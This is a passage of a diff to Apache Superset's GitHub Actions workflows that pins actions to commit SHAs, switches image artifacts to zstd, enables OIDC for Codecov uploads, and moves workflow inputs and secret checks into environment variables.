uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version-file: './docs/.nvmrc'
|
||||
- name: yarn install
|
||||
run: |
|
||||
yarn install --check-cache
|
||||
- name: Download database diagnostics from integration tests
|
||||
uses: dawidd6/action-download-artifact@v16
|
||||
uses: dawidd6/action-download-artifact@8305c0f1062bb0d184d09ef4493ecb9288447732 # v20
|
||||
with:
|
||||
workflow: superset-python-integrationtest.yml
|
||||
run_id: ${{ github.event.workflow_run.id }}
|
||||
name: database-diagnostics
|
||||
path: docs/src/data/
|
||||
if_no_artifact_found: 'warning'
|
||||
- name: Use fresh diagnostics
|
||||
run: |
|
||||
if [ -f "src/data/databases-diagnostics.json" ]; then
|
||||
|
||||
20
.github/workflows/superset-e2e.yml
vendored
20
.github/workflows/superset-e2e.yml
vendored
@@ -69,21 +69,21 @@ jobs:
|
||||
# Conditional checkout based on context
|
||||
- name: Checkout for push or pull_request event
|
||||
if: github.event_name == 'push' || github.event_name == 'pull_request'
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
ref: ${{ github.event_name == 'pull_request' && github.event.pull_request.head.sha || github.sha }}
|
||||
- name: Checkout using ref (workflow_dispatch)
|
||||
if: github.event_name == 'workflow_dispatch' && github.event.inputs.ref != ''
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
ref: ${{ github.event.inputs.ref }}
|
||||
submodules: recursive
|
||||
- name: Checkout using PR ID (workflow_dispatch)
|
||||
if: github.event_name == 'workflow_dispatch' && github.event.inputs.pr_id != ''
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
ref: refs/pull/${{ github.event.inputs.pr_id }}/merge
|
||||
@@ -109,7 +109,7 @@ jobs:
|
||||
run: testdata
|
||||
- name: Setup Node.js
|
||||
if: steps.check.outputs.python || steps.check.outputs.frontend
|
||||
uses: actions/setup-node@v6
|
||||
uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version-file: './superset-frontend/.nvmrc'
|
||||
- name: Install npm dependencies
|
||||
@@ -146,7 +146,7 @@ jobs:
|
||||
SAFE_APP_ROOT=${APP_ROOT//\//_}
|
||||
echo "safe_app_root=$SAFE_APP_ROOT" >> $GITHUB_OUTPUT
|
||||
- name: Upload Artifacts
|
||||
uses: actions/upload-artifact@v7
|
||||
uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
|
||||
if: failure()
|
||||
with:
|
||||
path: ${{ github.workspace }}/superset-frontend/cypress-base/cypress/screenshots
|
||||
@@ -186,21 +186,21 @@ jobs:
|
||||
# Conditional checkout based on context (same as Cypress workflow)
|
||||
- name: Checkout for push or pull_request event
|
||||
if: github.event_name == 'push' || github.event_name == 'pull_request'
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
ref: ${{ github.event_name == 'pull_request' && github.event.pull_request.head.sha || github.sha }}
|
||||
- name: Checkout using ref (workflow_dispatch)
|
||||
if: github.event_name == 'workflow_dispatch' && github.event.inputs.ref != ''
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
ref: ${{ github.event.inputs.ref }}
|
||||
submodules: recursive
|
||||
- name: Checkout using PR ID (workflow_dispatch)
|
||||
if: github.event_name == 'workflow_dispatch' && github.event.inputs.pr_id != ''
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
ref: refs/pull/${{ github.event.inputs.pr_id }}/merge
|
||||
@@ -226,7 +226,7 @@ jobs:
|
||||
run: playwright_testdata
|
||||
- name: Setup Node.js
|
||||
if: steps.check.outputs.python || steps.check.outputs.frontend
|
||||
uses: actions/setup-node@v6
|
||||
uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version-file: './superset-frontend/.nvmrc'
|
||||
- name: Install npm dependencies
|
||||
@@ -259,7 +259,7 @@ jobs:
|
||||
SAFE_APP_ROOT=${APP_ROOT//\//_}
|
||||
echo "safe_app_root=$SAFE_APP_ROOT" >> $GITHUB_OUTPUT
|
||||
- name: Upload Playwright Artifacts
|
||||
uses: actions/upload-artifact@v7
|
||||
uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
|
||||
if: failure()
|
||||
with:
|
||||
path: |
|
||||
|
||||
@@ -24,7 +24,7 @@ jobs:
|
||||
working-directory: superset-extensions-cli
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
@@ -49,7 +49,7 @@ jobs:
|
||||
|
||||
- name: Upload coverage reports to Codecov
|
||||
if: steps.check.outputs.superset-extensions-cli
|
||||
uses: codecov/codecov-action@v5
|
||||
uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
|
||||
with:
|
||||
file: ./coverage.xml
|
||||
flags: superset-extensions-cli
|
||||
@@ -58,7 +58,7 @@ jobs:
|
||||
|
||||
- name: Upload HTML coverage report
|
||||
if: steps.check.outputs.superset-extensions-cli
|
||||
uses: actions/upload-artifact@v7
|
||||
uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
|
||||
with:
|
||||
name: superset-extensions-cli-coverage-html
|
||||
path: htmlcov/
|
||||
|
||||
35
.github/workflows/superset-frontend.yml
vendored
35
.github/workflows/superset-frontend.yml
vendored
@@ -23,7 +23,7 @@ jobs:
|
||||
should-run: ${{ steps.check.outputs.frontend }}
|
||||
steps:
|
||||
- name: Checkout Code
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
fetch-depth: 0
|
||||
@@ -54,14 +54,14 @@ jobs:
|
||||
- name: Save Docker Image as Artifact
|
||||
if: steps.check.outputs.frontend
|
||||
run: |
|
||||
docker save $TAG | gzip > docker-image.tar.gz
|
||||
docker save $TAG | zstd -3 --threads=0 > docker-image.tar.zst
|
||||
|
||||
- name: Upload Docker Image Artifact
|
||||
if: steps.check.outputs.frontend
|
||||
uses: actions/upload-artifact@v7
|
||||
uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
|
||||
with:
|
||||
name: docker-image
|
||||
path: docker-image.tar.gz
|
||||
path: docker-image.tar.zst
|
||||
|
||||
sharded-jest-tests:
|
||||
needs: frontend-build
|
||||
@@ -73,12 +73,13 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: Download Docker Image Artifact
|
||||
uses: actions/download-artifact@v8
|
||||
uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8
|
||||
with:
|
||||
name: docker-image
|
||||
|
||||
- name: Load Docker Image
|
||||
run: docker load < docker-image.tar.gz
|
||||
run: |
|
||||
zstd -d < docker-image.tar.zst | docker load
|
||||
|
||||
- name: npm run test with coverage
|
||||
run: |
|
||||
@@ -90,7 +91,7 @@ jobs:
|
||||
"npm run test -- --coverage --shard=${{ matrix.shard }}/8 --coverageReporters=json"
|
||||
|
||||
- name: Upload Coverage Artifact
|
||||
uses: actions/upload-artifact@v7
|
||||
uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
|
||||
with:
|
||||
name: coverage-artifacts-${{ matrix.shard }}
|
||||
path: superset-frontend/coverage
|
||||
@@ -103,14 +104,14 @@ jobs:
|
||||
id-token: write
|
||||
steps:
|
||||
- name: Checkout Code
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
fetch-depth: 0
|
||||
ref: ${{ github.event_name == 'pull_request' && github.event.pull_request.head.sha || github.sha }}
|
||||
|
||||
- name: Download Coverage Artifacts
|
||||
uses: actions/download-artifact@v8
|
||||
uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8
|
||||
with:
|
||||
pattern: coverage-artifacts-*
|
||||
path: coverage/
|
||||
@@ -127,7 +128,7 @@ jobs:
|
||||
run: npx nyc merge coverage/ merged-output/coverage-summary.json
|
||||
|
||||
- name: Upload Code Coverage
|
||||
uses: codecov/codecov-action@v5
|
||||
uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
|
||||
with:
|
||||
flags: javascript
|
||||
use_oidc: true
|
||||
@@ -142,13 +143,13 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: Download Docker Image Artifact
|
||||
uses: actions/download-artifact@v8
|
||||
uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8
|
||||
with:
|
||||
name: docker-image
|
||||
|
||||
- name: Load Docker Image
|
||||
run: |
|
||||
docker load < docker-image.tar.gz
|
||||
zstd -d < docker-image.tar.zst | docker load
|
||||
|
||||
- name: lint
|
||||
run: |
|
||||
@@ -166,12 +167,13 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: Download Docker Image Artifact
|
||||
uses: actions/download-artifact@v8
|
||||
uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8
|
||||
with:
|
||||
name: docker-image
|
||||
|
||||
- name: Load Docker Image
|
||||
run: docker load < docker-image.tar.gz
|
||||
run: |
|
||||
zstd -d < docker-image.tar.zst | docker load
|
||||
|
||||
- name: Build Plugins Packages
|
||||
run: |
|
||||
@@ -184,12 +186,13 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: Download Docker Image Artifact
|
||||
uses: actions/download-artifact@v8
|
||||
uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8
|
||||
with:
|
||||
name: docker-image
|
||||
|
||||
- name: Load Docker Image
|
||||
run: docker load < docker-image.tar.gz
|
||||
run: |
|
||||
zstd -d < docker-image.tar.zst | docker load
|
||||
|
||||
- name: Build Storybook and Run Tests
|
||||
run: |
|
||||
|
||||
4
.github/workflows/superset-helm-lint.yml
vendored
4
.github/workflows/superset-helm-lint.yml
vendored
@@ -16,14 +16,14 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Helm
|
||||
uses: azure/setup-helm@v4
|
||||
uses: azure/setup-helm@dda3372f752e03dde6b3237bc9431cdc2f7a02a2 # v5.0.0
|
||||
with:
|
||||
version: v3.16.4
|
||||
|
||||
|
||||
6
.github/workflows/superset-helm-release.yml
vendored
6
.github/workflows/superset-helm-release.yml
vendored
@@ -29,7 +29,7 @@ jobs:
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
ref: ${{ inputs.ref || github.ref_name }}
|
||||
persist-credentials: true
|
||||
@@ -42,7 +42,7 @@ jobs:
|
||||
git config user.email "$GITHUB_ACTOR@users.noreply.github.com"
|
||||
|
||||
- name: Install Helm
|
||||
uses: azure/setup-helm@v4
|
||||
uses: azure/setup-helm@dda3372f752e03dde6b3237bc9431cdc2f7a02a2 # v5.0.0
|
||||
with:
|
||||
version: v3.5.4
|
||||
|
||||
@@ -101,7 +101,7 @@ jobs:
|
||||
CR_RELEASE_NAME_TEMPLATE: "superset-helm-chart-{{ .Version }}"
|
||||
|
||||
- name: Open Pull Request
|
||||
uses: actions/github-script@v8
|
||||
uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
|
||||
with:
|
||||
script: |
|
||||
const branchName = '${{ env.branch_name }}';
|
||||
|
||||
10
.github/workflows/superset-playwright.yml
vendored
10
.github/workflows/superset-playwright.yml
vendored
@@ -60,21 +60,21 @@ jobs:
|
||||
# Conditional checkout based on context (same as Cypress workflow)
|
||||
- name: Checkout for push or pull_request event
|
||||
if: github.event_name == 'push' || github.event_name == 'pull_request'
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
ref: ${{ github.event_name == 'pull_request' && github.event.pull_request.head.sha || github.sha }}
|
||||
- name: Checkout using ref (workflow_dispatch)
|
||||
if: github.event_name == 'workflow_dispatch' && github.event.inputs.ref != ''
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
ref: ${{ github.event.inputs.ref }}
|
||||
submodules: recursive
|
||||
- name: Checkout using PR ID (workflow_dispatch)
|
||||
if: github.event_name == 'workflow_dispatch' && github.event.inputs.pr_id != ''
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
ref: refs/pull/${{ github.event.inputs.pr_id }}/merge
|
||||
@@ -100,7 +100,7 @@ jobs:
|
||||
run: playwright_testdata
|
||||
- name: Setup Node.js
|
||||
if: steps.check.outputs.python || steps.check.outputs.frontend
|
||||
uses: actions/setup-node@v6
|
||||
uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version-file: './superset-frontend/.nvmrc'
|
||||
- name: Install npm dependencies
|
||||
@@ -133,7 +133,7 @@ jobs:
|
||||
SAFE_APP_ROOT=${APP_ROOT//\//_}
|
||||
echo "safe_app_root=$SAFE_APP_ROOT" >> $GITHUB_OUTPUT
|
||||
- name: Upload Playwright Artifacts
|
||||
uses: actions/upload-artifact@v7
|
||||
uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
|
||||
if: failure()
|
||||
with:
|
||||
path: |
|
||||
|
||||
@@ -16,6 +16,8 @@ concurrency:
|
||||
jobs:
|
||||
test-mysql:
|
||||
runs-on: ubuntu-24.04
|
||||
permissions:
|
||||
id-token: write
|
||||
env:
|
||||
PYTHONPATH: ${{ github.workspace }}
|
||||
SUPERSET_CONFIG: tests.integration_tests.superset_test_config
|
||||
@@ -41,7 +43,7 @@ jobs:
|
||||
- 16379:6379
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
@@ -68,11 +70,12 @@ jobs:
|
||||
run: |
|
||||
./scripts/python_tests.sh
|
||||
- name: Upload code coverage
|
||||
uses: codecov/codecov-action@v5
|
||||
uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
|
||||
with:
|
||||
flags: python,mysql
|
||||
token: ${{ secrets.CODECOV_TOKEN }}
|
||||
verbose: true
|
||||
use_oidc: true
|
||||
slug: apache/superset
|
||||
- name: Generate database diagnostics for docs
|
||||
if: steps.check.outputs.python
|
||||
env:
|
||||
@@ -98,13 +101,15 @@ jobs:
|
||||
"
|
||||
- name: Upload database diagnostics artifact
|
||||
if: steps.check.outputs.python
|
||||
uses: actions/upload-artifact@v7
|
||||
uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
|
||||
with:
|
||||
name: database-diagnostics
|
||||
path: databases-diagnostics.json
|
||||
retention-days: 7
|
||||
test-postgres:
|
||||
runs-on: ubuntu-24.04
|
||||
permissions:
|
||||
id-token: write
|
||||
strategy:
|
||||
matrix:
|
||||
python-version: ["current", "previous", "next"]
|
||||
@@ -129,7 +134,7 @@ jobs:
|
||||
- 16379:6379
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
@@ -159,14 +164,17 @@ jobs:
|
||||
run: |
|
||||
./scripts/python_tests.sh
|
||||
- name: Upload code coverage
|
||||
uses: codecov/codecov-action@v5
|
||||
uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
|
||||
with:
|
||||
flags: python,postgres
|
||||
token: ${{ secrets.CODECOV_TOKEN }}
|
||||
verbose: true
|
||||
use_oidc: true
|
||||
slug: apache/superset
|
||||
|
||||
test-sqlite:
|
||||
runs-on: ubuntu-24.04
|
||||
permissions:
|
||||
id-token: write
|
||||
env:
|
||||
PYTHONPATH: ${{ github.workspace }}
|
||||
SUPERSET_CONFIG: tests.integration_tests.superset_test_config
|
||||
@@ -182,7 +190,7 @@ jobs:
|
||||
- 16379:6379
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
@@ -211,8 +219,9 @@ jobs:
|
||||
run: |
|
||||
./scripts/python_tests.sh
|
||||
- name: Upload code coverage
|
||||
uses: codecov/codecov-action@v5
|
||||
uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
|
||||
with:
|
||||
flags: python,sqlite
|
||||
token: ${{ secrets.CODECOV_TOKEN }}
|
||||
verbose: true
|
||||
use_oidc: true
|
||||
slug: apache/superset
|
||||
|
||||
@@ -17,6 +17,8 @@ concurrency:
|
||||
jobs:
|
||||
test-postgres-presto:
|
||||
runs-on: ubuntu-24.04
|
||||
permissions:
|
||||
id-token: write
|
||||
env:
|
||||
PYTHONPATH: ${{ github.workspace }}
|
||||
SUPERSET_CONFIG: tests.integration_tests.superset_test_config
|
||||
@@ -48,7 +50,7 @@ jobs:
|
||||
- 16379:6379
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
@@ -77,14 +79,17 @@ jobs:
|
||||
run: |
|
||||
./scripts/python_tests.sh -m 'chart_data_flow or sql_json_flow'
|
||||
- name: Upload code coverage
|
||||
uses: codecov/codecov-action@v5
|
||||
uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
|
||||
with:
|
||||
flags: python,presto
|
||||
token: ${{ secrets.CODECOV_TOKEN }}
|
||||
verbose: true
|
||||
use_oidc: true
|
||||
slug: apache/superset
|
||||
|
||||
test-postgres-hive:
|
||||
runs-on: ubuntu-24.04
|
||||
permissions:
|
||||
id-token: write
|
||||
env:
|
||||
PYTHONPATH: ${{ github.workspace }}
|
||||
SUPERSET_CONFIG: tests.integration_tests.superset_test_config
|
||||
@@ -108,7 +113,7 @@ jobs:
|
||||
- 16379:6379
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
@@ -145,8 +150,9 @@ jobs:
|
||||
pip install -e .[hive]
|
||||
./scripts/python_tests.sh -m 'chart_data_flow or sql_json_flow'
|
||||
- name: Upload code coverage
|
||||
uses: codecov/codecov-action@v5
|
||||
uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
|
||||
with:
|
||||
flags: python,hive
|
||||
token: ${{ secrets.CODECOV_TOKEN }}
|
||||
verbose: true
|
||||
use_oidc: true
|
||||
slug: apache/superset
|
||||
|
||||
@@ -17,6 +17,8 @@ concurrency:
|
||||
jobs:
|
||||
unit-tests:
|
||||
runs-on: ubuntu-24.04
|
||||
permissions:
|
||||
id-token: write
|
||||
strategy:
|
||||
matrix:
|
||||
python-version: ["previous", "current", "next"]
|
||||
@@ -24,7 +26,7 @@ jobs:
|
||||
PYTHONPATH: ${{ github.workspace }}
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
@@ -53,8 +55,9 @@ jobs:
|
||||
run: |
|
||||
pytest --durations-min=0.5 --cov=superset/sql/ ./tests/unit_tests/sql/ --cache-clear --cov-fail-under=100
|
||||
- name: Upload code coverage
|
||||
uses: codecov/codecov-action@v5
|
||||
uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v5
|
||||
with:
|
||||
flags: python,unit
|
||||
token: ${{ secrets.CODECOV_TOKEN }}
|
||||
verbose: true
|
||||
use_oidc: true
|
||||
slug: apache/superset
|
||||
|
||||
10
.github/workflows/superset-translations.yml
vendored
10
.github/workflows/superset-translations.yml
vendored
@@ -18,7 +18,7 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
@@ -31,7 +31,7 @@ jobs:
|
||||
|
||||
- name: Setup Node.js
|
||||
if: steps.check.outputs.frontend
|
||||
uses: actions/setup-node@v6
|
||||
uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version-file: './superset-frontend/.nvmrc'
|
||||
- name: Install dependencies
|
||||
@@ -49,7 +49,7 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
@@ -62,6 +62,10 @@ jobs:
|
||||
- name: Setup Python
|
||||
if: steps.check.outputs.python
|
||||
uses: ./.github/actions/setup-backend/
|
||||
|
||||
- name: Install msgcat
|
||||
run: sudo apt update && sudo apt install gettext
|
||||
|
||||
- name: Test babel extraction
|
||||
if: steps.check.outputs.python
|
||||
run: ./scripts/translations/babel_update.sh
|
||||
|
||||
2
.github/workflows/superset-websocket.yml
vendored
2
.github/workflows/superset-websocket.yml
vendored
@@ -21,7 +21,7 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
- name: Install dependencies
|
||||
|
||||
4
.github/workflows/supersetbot.yml
vendored
4
.github/workflows/supersetbot.yml
vendored
@@ -26,7 +26,7 @@ jobs:
|
||||
steps:
|
||||
- name: Quickly add thumbs up!
|
||||
if: github.event_name == 'issue_comment' && contains(github.event.comment.body, '@supersetbot')
|
||||
uses: actions/github-script@v8
|
||||
uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
|
||||
with:
|
||||
script: |
|
||||
const [owner, repo] = process.env.GITHUB_REPOSITORY.split('/')
|
||||
@@ -38,7 +38,7 @@ jobs:
|
||||
});
|
||||
|
||||
- name: "Checkout ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
|
||||
|
||||
24
.github/workflows/tag-release.yml
vendored
24
.github/workflows/tag-release.yml
vendored
@@ -31,10 +31,12 @@ jobs:
|
||||
id: check
|
||||
shell: bash
|
||||
run: |
|
||||
if [ -n "${{ (secrets.DOCKERHUB_USER != '' && secrets.DOCKERHUB_TOKEN != '') || '' }}" ]; then
|
||||
if [ -n "${DOCKERHUB_USER}" ]; then
|
||||
echo "has-secrets=1" >> "$GITHUB_OUTPUT"
|
||||
fi
|
||||
|
||||
env:
|
||||
DOCKERHUB_USER: ${{ (secrets.DOCKERHUB_USER != '' && secrets.DOCKERHUB_TOKEN != '') || '' }}
|
||||
docker-release:
|
||||
needs: config
|
||||
if: needs.config.outputs.has-secrets
|
||||
@@ -47,7 +49,7 @@ jobs:
|
||||
steps:
|
||||
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
@@ -60,7 +62,7 @@ jobs:
|
||||
build: "true"
|
||||
|
||||
- name: Use Node.js 20
|
||||
uses: actions/setup-node@v6
|
||||
uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version: 20
|
||||
|
||||
@@ -72,17 +74,20 @@ jobs:
|
||||
DOCKERHUB_USER: ${{ secrets.DOCKERHUB_USER }}
|
||||
DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
INPUT_RELEASE: ${{ github.event.inputs.release }}
|
||||
INPUT_FORCE_LATEST: ${{ github.event.inputs.force-latest }}
|
||||
INPUT_GIT_REF: ${{ github.event.inputs.git-ref }}
|
||||
run: |
|
||||
RELEASE="${{ github.event.release.tag_name }}"
|
||||
FORCE_LATEST=""
|
||||
EVENT="${{github.event_name}}"
|
||||
if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then
|
||||
# in the case of a manually-triggered run, read release from input
|
||||
RELEASE="${{ github.event.inputs.release }}"
|
||||
if [ "${{ github.event.inputs.force-latest }}" = "true" ]; then
|
||||
RELEASE="${INPUT_RELEASE}"
|
||||
if [ "${INPUT_FORCE_LATEST}" = "true" ]; then
|
||||
FORCE_LATEST="--force-latest"
|
||||
fi
|
||||
git checkout "${{ github.event.inputs.git-ref }}"
|
||||
git checkout "${INPUT_GIT_REF}"
|
||||
EVENT="release"
|
||||
fi
|
||||
|
||||
@@ -107,12 +112,12 @@ jobs:
|
||||
steps:
|
||||
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Use Node.js 20
|
||||
uses: actions/setup-node@v6
|
||||
uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version: 20
|
||||
|
||||
@@ -122,6 +127,7 @@ jobs:
|
||||
- name: Label the PRs with the right release-related labels
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
INPUT_RELEASE: ${{ github.event.inputs.release }}
|
||||
run: |
|
||||
export GITHUB_ACTOR=""
|
||||
git fetch --all --tags
|
||||
@@ -129,6 +135,6 @@ jobs:
|
||||
RELEASE="${{ github.event.release.tag_name }}"
|
||||
if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then
|
||||
# in the case of a manually-triggered run, read release from input
|
||||
RELEASE="${{ github.event.inputs.release }}"
|
||||
RELEASE="${INPUT_RELEASE}"
|
||||
fi
|
||||
supersetbot release-label $RELEASE
|
||||
|
||||
8
.github/workflows/tech-debt.yml
vendored
8
.github/workflows/tech-debt.yml
vendored
@@ -19,10 +19,12 @@ jobs:
|
||||
id: check
|
||||
shell: bash
|
||||
run: |
|
||||
if [ -n "${{ (secrets.GSHEET_KEY != '' ) || '' }}" ]; then
|
||||
if [ -n "${GSHEET_KEY}" ]; then
|
||||
echo "has-secrets=1" >> "$GITHUB_OUTPUT"
|
